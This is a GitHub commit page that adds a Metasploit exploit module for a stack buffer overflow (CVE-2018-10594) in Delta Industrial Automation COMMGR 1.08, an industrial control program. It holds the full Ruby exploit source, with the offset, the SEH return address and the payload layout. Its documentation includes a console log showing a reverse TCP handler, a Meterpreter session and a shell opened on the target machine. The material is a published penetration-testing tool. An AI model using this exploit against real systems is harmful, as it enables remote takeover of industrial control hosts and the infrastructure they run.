Permalink
Browse files

Land #10672, Add COMMGR Buffer Overflow module

  • Loading branch information...
space-r7 committed Oct 8, 2018
2 parents 7327fa8 + 22c57d1 commit bed497c6aef899c4cb59d8f8ee4fb00ba3b29b19
@@ -0,0 +1,67 @@
## Vulnerable Application
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
## Verification Steps
1. Install Delta Industrial Automation COMMGR 1.08
2. Start ```msfconsole```
3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
4. Do ```set RHOST <target_ip>```
5. Do ```run```
6. You should get a shell. :)
## Scenarios
### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
```
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options
Module options (exploit/windows/scada/delta_ia_commgr_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 502 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 COMMGR 1.08 / Windows Universal
msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run
[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
meterpreter > sysinfo
Computer : TEST01
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
```
@@ -0,0 +1,75 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'EDB', '44965'],
[ 'CVE', '2018-10594']
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end

0 comments on commit bed497c

Please sign in to comment.